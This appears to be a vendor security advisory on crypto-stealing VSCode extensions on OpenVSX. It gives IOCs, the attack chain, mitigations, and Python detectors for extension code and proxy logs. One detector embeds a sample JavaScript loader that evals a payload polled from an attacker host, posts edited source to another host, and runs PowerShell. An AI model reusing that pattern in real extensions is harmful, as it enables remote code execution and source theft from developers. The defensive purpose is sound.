Malicious Crypto-Stealing VSCode Extensions Target OpenVSX and AI Code Editors: Threat Analysis and Mitigation
- Rescana
- 17 hours ago
- 5 min read

Executive Summary
A new wave of malicious activity has been detected targeting the developer ecosystem through the distribution of crypto-stealing and data-exfiltrating extensions on the OpenVSX registry, a popular open-source alternative to the official Visual Studio Code (VSCode) Marketplace. These extensions, often masquerading as legitimate tools for languages such as Solidity and C++, are engineered to steal cryptocurrency, exfiltrate sensitive source code, and establish persistent remote access to developer environments. Despite takedowns from the official VSCode Marketplace, these threats persist on OpenVSX, which is widely used by next-generation AI-powered editors like Cursor and Windsurf. The campaign has resulted in at least one confirmed theft of $500,000 in crypto assets and demonstrates advanced evasion, persistence, and social engineering techniques. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, and actionable mitigation strategies for organizations and developers.
Threat Actor Profile
The primary threat actor behind this campaign is tracked as TigerJack, a group or individual demonstrating a high degree of operational security, technical sophistication, and persistence. TigerJack employs multi-account operations, impersonates legitimate developers, and leverages credible branding and GitHub repositories to increase the trustworthiness of their malicious extensions. The actor rapidly re-uploads new malicious packages after takedowns, often using typosquatting techniques such as visually similar developer names (e.g., "juanbIanco" with a capital "I" instead of "juanblanco"). The campaign is not currently attributed to a known Advanced Persistent Threat (APT) group but shares characteristics with the earlier WhiteCobra campaign, which also targeted the VSCode ecosystem with crypto-stealing extensions.
Technical Analysis of Malware/TTPs
The malicious extensions identified on OpenVSX include, but are not limited to, C++ Playground, HTTP Format, pythonformat, Solidity Language, and a malicious variant of the solidity extension. These extensions are distributed under the guise of providing legitimate development features such as syntax highlighting or code formatting. However, upon installation and activation, they execute a multi-stage attack chain:
The initial infection occurs when a user installs a malicious extension from OpenVSX. The extension may appear recently updated and have inflated download counts, achieved through bot activity to boost its ranking in search results. Once activated, the extension downloads and executes a remote JavaScript or PowerShell payload from hardcoded endpoints such as ab498.pythonanywhere.com/static/in4.js or https://angelic[.]su/files/1.txt. This payload is polled at regular intervals (e.g., every 20 minutes), enabling dynamic delivery of new malicious code without requiring extension updates.
The payloads perform several malicious actions. In the case of C++ Playground, the extension registers an onDidChangeTextDocument listener, capturing and exfiltrating source code in near real-time (within 500 milliseconds of edits) to external servers. This enables intellectual property theft, reconnaissance, and potential supply chain compromise. HTTP Format and similar extensions operate as advertised but surreptitiously run a CoinIMP cryptocurrency miner in the background, hijacking host CPU and GPU resources for illicit mining operations. There are no resource usage restrictions, which can lead to significant performance degradation and increased operational costs.
More advanced extensions, such as the malicious Solidity Language and solidity variants, target blockchain and cryptocurrency developers. These extensions download and execute PowerShell scripts that check for the presence of remote access tools like ScreenConnect. If absent, the script downloads and installs ScreenConnect from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest, establishing persistent remote access via a command and control (C2) server at relay.lmfao[.]su (IP: 144.172.112[.]84). The attackers then use ScreenConnect to upload and execute additional VBScripts, which in turn download further PowerShell payloads from services like paste.ee. These scripts extract and run the VMDetector loader from an image hosted on archive[.]org, which finally downloads and executes the Quasar backdoor and a stealer identified as HEUR:Trojan-PSW.MSIL.PureLogs.gen. This stealer is capable of harvesting browser credentials, email data, and, critically, cryptocurrency wallet passphrases.
The attack chain is designed for persistence and reinfection. After takedown, the threat actor re-uploads new malicious extensions with similar names and functionality, using typosquatting and download inflation to regain visibility. The extensions are often indistinguishable from legitimate ones in search results, increasing the risk of inadvertent installation.
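As an added illustration (not code from this advisory or from the extensions it names), the following Python triage function scores an extension's JavaScript for the behaviour combinations described above: a periodic remote fetch fed to eval, an onDidChangeTextDocument hook paired with outbound HTTP, and a PowerShell spawn. The sample extension source it scans is constructed for this example; the hosts are those listed in the advisory.

```python
import re

# Constructed stand-in for an extension entry point, showing the three behaviours the advisory
# describes (polled remote payload fed to eval, editor-event exfiltration, PowerShell spawning).
# Illustrative only; it is not code recovered from any TigerJack extension.
SAMPLE_EXTENSION_JS = r"""
const vscode = require('vscode');
const https = require('https');
const { exec } = require('child_process');
function poll() {
  https.get('https://ab498.pythonanywhere.com/static/in4.js', r => {
    let body = ''; r.on('data', d => body += d); r.on('end', () => eval(body));
  });
}
function activate(ctx) {
  setInterval(poll, 20 * 60 * 1000);
  vscode.workspace.onDidChangeTextDocument(e => {
    https.request({ host: 'angelic.su', method: 'POST' }).end(e.document.getText());
  });
  exec('powershell -File stage2.ps1');
}
"""
# Single indicators; verdicts below require combinations, so a formatter that only hooks
# onDidChangeTextDocument is not flagged by itself.
RULES = {
    "remote_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "periodic_polling": re.compile(r"\bsetInterval\s*\("),
    "editor_event_hook": re.compile(r"onDidChangeTextDocument"),
    "outbound_http": re.compile(r"https?\.(?:get|request)\s*\(|\bfetch\s*\(|\baxios\b"),
    "shell_spawn": re.compile(r"child_process|\bexec(?:Sync)?\s*\(|\bspawn\s*\("),
    "powershell": re.compile(r"powershell", re.IGNORECASE),
}
# Hosts named in the advisory, kept defanged and refanged only for matching.
IOC_HOSTS = ["ab498.pythonanywhere.com", "angelic[.]su", "lmfao[.]su", "relay.lmfao[.]su"]

def triage(source: str) -> dict:
    """Score one extension's JavaScript against the TTPs described in the advisory."""
    hits = {name: len(rx.findall(source)) for name, rx in RULES.items()}
    iocs = [h for h in IOC_HOSTS if h.replace("[.]", ".") in source]
    verdicts = []
    if hits["editor_event_hook"] and hits["outbound_http"]:
        verdicts.append("source-exfiltration")      # C++ Playground pattern
    if hits["periodic_polling"] and hits["remote_eval"] and hits["outbound_http"]:
        verdicts.append("remote-payload-loader")    # polled in4.js / 1.txt pattern
    if hits["shell_spawn"] and hits["powershell"]:
        verdicts.append("powershell-dropper")       # Solidity Language pattern
    if iocs:
        verdicts.append("known-ioc")
    return {"hits": hits, "iocs": iocs, "verdicts": verdicts}
```

Point it at the `extension.js` (or the bundled `out/*.js`) of each installed extension; a hit on any combined verdict warrants manual review, while single indicators alone are common in benign extensions.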
Exploitation in the Wild
The exploitation of these malicious extensions has been observed in the wild, with victims primarily among developers using Cursor, Windsurf, and other editors that rely on OpenVSX. The campaign is global in scope, with no specific country targeting, but has a particular focus on blockchain and cryptocurrency development sectors. The most notable confirmed incident involved a blockchain developer who lost approximately $500,000 in crypto assets after installing a malicious Solidity Language extension. Attackers gained persistent remote access, exfiltrated sensitive data, and deployed additional malware, including credential stealers and backdoors.
Distribution tactics include promoting malicious extensions in OpenVSX search results using recent update dates and artificially inflated download counts. Legitimate and malicious extensions often appear side-by-side, with nearly identical names and developer identities, making it challenging for users to distinguish between them. The rapid re-uploading of new malicious packages after takedowns further complicates mitigation efforts.
Victimology and Targeting
The primary victims of this campaign are developers and organizations in the blockchain, cryptocurrency, and software development sectors. The attack surface is expanded by the use of AI-powered code editors such as Cursor and Windsurf, which default to the OpenVSX registry for extension management. The campaign does not appear to target specific countries but rather exploits the global nature of the developer community. The use of typosquatting and social engineering in extension descriptions increases the likelihood of successful compromise, particularly among less security-aware users.
The impact of these attacks is significant, ranging from direct financial loss through cryptocurrency theft to intellectual property exfiltration and the establishment of persistent backdoors within corporate networks. The ability of the malware to inject backdoors into projects and monitor real-time activity further elevates the risk of supply chain compromise.
Mitigation and Countermeasures
Organizations and individual developers are strongly advised to take immediate and long-term actions to mitigate the risk posed by malicious OpenVSX extensions. Immediate steps include auditing all installed extensions for the indicators of compromise (IOCs) listed in this report, removing any suspicious or unverified extensions—especially those named C++ Playground, HTTP Format, pythonformat, Solidity Language, and the malicious solidity variant—and monitoring for connections to known C2 domains such as ab498.pythonanywhere.com, angelic[.]su, and relay.lmfao[.]su. System resource usage should be reviewed for unexplained spikes, which may indicate unauthorized crypto mining activity. Additionally, check for unauthorized installation of remote access tools like ScreenConnect.
Long-term recommendations include installing extensions only from verified and reputable publishers, closely monitoring extension updates and permissions, and implementing endpoint monitoring solutions capable of detecting suspicious extension behavior and PowerShell execution. Organizations should educate developers on the risks of typosquatting and social engineering in extension marketplaces and encourage the reporting of suspicious extensions to OpenVSX and VSCode maintainers. The deployment of Extended Detection and Response (XDR) solutions is recommended to monitor for suspicious activity within the corporate network and to provide rapid incident response capabilities.
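An added example, not part of the advisory, of the network-side check recommended above: it matches constructed proxy log lines against the C2 domains, relay IP and ScreenConnect download path named in this report, and separately flags client/URL pairs fetched at the fixed 20-minute cadence the loader uses. The proxy log format is an assumption made for the example.

```python
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# IOCs exactly as the advisory lists them (defanged); they are refanged only at match time.
IOC_DOMAINS = ["ab498.pythonanywhere.com", "angelic[.]su", "lmfao[.]su", "relay.lmfao[.]su"]
IOC_IPS = ["144.172.112[.]84"]
IOC_PATHS = ["/Bin/ScreenConnect.ClientSetup.msi", "/static/in4.js", "/files/1.txt"]
# Constructed proxy log; assumed format "<utc timestamp> <client ip> <method> <target> <status>".
SAMPLE_PROXY_LOG = """\
2025-10-17T09:14:02Z 10.0.5.21 GET https://marketplace.visualstudio.com/items?itemName=ms-python.python 200
2025-10-17T09:14:40Z 10.0.5.21 GET https://ab498.pythonanywhere.com/static/in4.js 200
2025-10-17T09:34:41Z 10.0.5.21 GET https://ab498.pythonanywhere.com/static/in4.js 200
2025-10-17T09:35:10Z 10.0.5.33 GET https://lmfao.su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest 200
2025-10-17T09:36:00Z 10.0.5.33 CONNECT 144.172.112.84:443 200
2025-10-17T09:40:00Z 10.0.5.40 GET https://github.com/example/repo 200
"""
def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")

def parse(line: str):
    ts, src, _method, target, *_ = line.split()
    url = urlparse(target if "://" in target else "//" + target)  # CONNECT lines carry only host:port
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, (url.hostname or "").lower(), url.path, target
def match_line(line: str):
    """Return (client, host, reasons) when the request touches a listed IOC, else None."""
    _, src, host, path, _ = parse(line)
    reasons = []
    for d in sorted(IOC_DOMAINS, key=len, reverse=True):  # most specific domain wins
        if host == refang(d) or host.endswith("." + refang(d)):
            reasons.append(f"domain:{d}")
            break
    reasons += [f"ip:{ip}" for ip in IOC_IPS if host == refang(ip)]
    reasons += [f"path:{p}" for p in IOC_PATHS if p.lower() in path.lower()]
    return (src, host, reasons) if reasons else None

def scan(log_text: str) -> list:
    return [m for m in (match_line(l) for l in log_text.splitlines() if l.strip()) if m]
def beacon_candidates(log_text: str, period_s: int = 20 * 60, tolerance_s: int = 90) -> list:
    """(client, url) pairs fetched repeatedly at a fixed cadence: the payload polling the advisory describes."""
    seen = defaultdict(list)
    for line in (l for l in log_text.splitlines() if l.strip()):
        ts, src, _, _, target = parse(line)
        seen[(src, target)].append(ts)
    out = []
    for key, times in seen.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if gaps and all(abs(g - period_s) <= tolerance_s for g in gaps):
            out.append(key)
    return out
```

The cadence check is useful after the actor rotates hosts, because it keys on the polling behaviour rather than on a specific domain.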
References
- BleepingComputer: Malicious crypto-stealing VSCode extensions resurface on OpenVSX
- Kaspersky: How extensions from Open VSX were used to steal cryptocurrency
- Securelist: Code highlighting with Cursor AI for $500,000
- TechRadar: VSCode market struck by huge influx of malicious WhiteCobra extensions
- MITRE ATT&CK Framework
- OpenVSX Registry
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats in real time. For more information or to discuss how Rescana can help secure your organization, we are happy to answer questions at ops@rescana.com.